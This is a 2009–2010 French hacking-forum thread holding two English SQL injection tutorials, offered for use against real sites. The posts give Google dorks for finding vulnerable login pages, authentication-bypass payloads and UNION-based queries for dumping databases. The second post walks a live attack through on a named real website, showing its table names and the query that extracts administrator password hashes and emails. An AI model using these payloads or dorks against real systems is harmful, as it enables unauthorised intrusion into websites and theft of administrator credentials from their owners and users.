Dark Angel Index du Forum
Dark Angel
Hacking and Reverse
 
Dark Angel Index du ForumFAQRechercherS’enregistrerConnexion

:: SQL Injection Tutorial ::

 
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps
Sujet précédent :: Sujet suivant  
Auteur Message
Mass Trauma
Membre
Membre

Hors ligne

Inscrit le: 21 Nov 2009
Messages: 96

MessagePosté le: Lun 28 Déc - 09:01 (2009)    Sujet du message: SQL Injection Tutorial Répondre en citant

by dan1el a.k.a $qL_DoCt0r

Q what is sql injection?

A injecting sql queries into another database or using queries to get auth bypass as an admin.

part 1 : Basic sql injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"


Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


there are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.

So your input should look like this

username:Admin
password:'or'1'='1

So click submit and you'r in
NOTE not all sites are vulnerable.


part 2: injecting sql queries to extract the admin username and password

ok so lets say we have a site :
http://www.xxxxx.com/index.php?catid=1
there is a list of dork 4 sites lyk this

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="

or the best in my view "full credit to qabandi for discovering this"
"inurl:".php?catid=" site:xxx"


So once you have you'r site
http://www.xxxx.com/index.php?catid=1
now we add a ' to the end of the url
so the site is
http://www.xxxx.com/index.php?catid=1'
if there is an error of some sort then it is vulnerable
now we need to find the number of columns in the sql database
so we type
http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 5-- "error"

so this database has 4 columns because we got an error on 5
on some databases there is 2 columns and on some 200 it varies
so once we have the column number.
we try the union function
http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"
if you see some numbers like 1 2 3 4 on the screen or the column names
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
so now we need to info about the db
so lets say the numbers 2 and 4 showed up on the screen
so i will use my query on 2
http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
the db type and version will pop up on the screen
if the db version is 4 or lower then to extract the password you will need these queries
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
this should display the table containing the admin username and password
but if not then you will have to guess the table
so once you have your table "or not"
then type
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
then once u have the right table name you should get the administrator password
then just do the same thing but type username instead of password
sometimes the password is hashed and you need to crack it.
then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de.com/c0de/perl/admin_1.2_.txt
now if the database is version 5 or up
type
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables
once you have your table name
type the same thing as 4
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
then the same with username
but now if it doesnt work far all those things
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
just play around with those
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--

well that about wraps up my sql injection tutorial.
you can contact me on
sidthesloth@windowslive.com
only msn me NO EMAILS I HATE THEM

Twisted Evil


Revenir en haut
Publicité






MessagePosté le: Lun 28 Déc - 09:01 (2009)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Karl
Membre
Membre

Hors ligne

Inscrit le: 23 Nov 2009
Messages: 108

MessagePosté le: Jeu 7 Jan - 06:05 (2010)    Sujet du message: SQL Injection Tutorial Répondre en citant

Un autre tuto plutot bien fait:

Written by ViP
.

For searching for SQL vulnerable sites,you can use these dork's which i found posted on the forum.

Dork: SQL Injection
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=



This website shown is legit vulnerable,i am not advising you to hack it but im making you aware the website exists and is vulnerable to this.

http://www.swidwin.mns.pl/news.php?id=-17' add ' to the end to check if its vulnerable

it gets error,i know its vulnerable so i remove the ' and do

http://www.swidwin.mns.pl/news.php?id=17 order by 1--
http://www.swidwin.mns.pl/news.php?id=17 order by 2--
http://www.swidwin.mns.pl/news.php?id=17 order by 3--

No errors i continue etc etc

i finally get an error when i do like below

http://www.swidwin.mns.pl/news.php?id=17 order by 13--

so this tells me 13 columns dont exist,so there must be 12 columns in the database

so next i do the UNION SELECT function as shown below


http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- (note make sure to add a - in between = 17 like =-17 in the ID)


i Hit enter


Numbers 4 and 5 appear,this means data can be extracted from numbers for and five


I Replace 4 in the url with @@version so it now looks like


http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12--



The i hit enter

5.0.32-Debian_7etch8-log


^this is the mysql version running,So its running version 5 that helps alot,(versions 4 and below we have the guess the table name's)


Now

Where we put @@version (4th spot)

Replace it with

group_concat(table_name) <<gets table name

like

http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12--


And at the end of union select string remove the -- after the 12 and add


+from+information_schema.tables+where+table_schema=database()--


So it now looks like

http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--


i Now see


x_admins,x_articles,x_ban,x_banners,x_banners_info,x_comments,x_file_categories, ​x_file_data,x_forum_a,x_forum_b,x_forum_c,x_gbook,x_infopages,x_links_categories ​,x_links_data,x_mails,x_menu,x_news,x_poll_data,x_poll_desc,x_pw,x_topic,x_users ​



Now replace group_Concat(table_name) with group_concat(column_name) and everything after union select 5,6,7,8,9,10,11,12 with
+from+information_schema.columns+where+table_name='x_admins'--

so it goes from

http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--

TO

http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 +from+information_schema.columns+where+table_name='x_admins'--

we see id,nick,pass,name,added,access,mail,stat

Learn about grouping at this point but now we add


group_concat(id,0x3a,pass,0x3a,mail) to were the group_concat(column_name) is and add +from+x_admins-- after 10,11,12

So the string becomes

http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(id,0x3a,pass,0x3a,mail),5,6,7,8,9,10,11,12 +from+x_admins--

At this point we obtain the admins password.


Revenir en haut
Contenu Sponsorisé






MessagePosté le: Aujourd’hui à 07:37 (2017)    Sujet du message: SQL Injection Tutorial

Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Portail | Index | Panneau d’administration | créer forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
HalloweenOclock © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com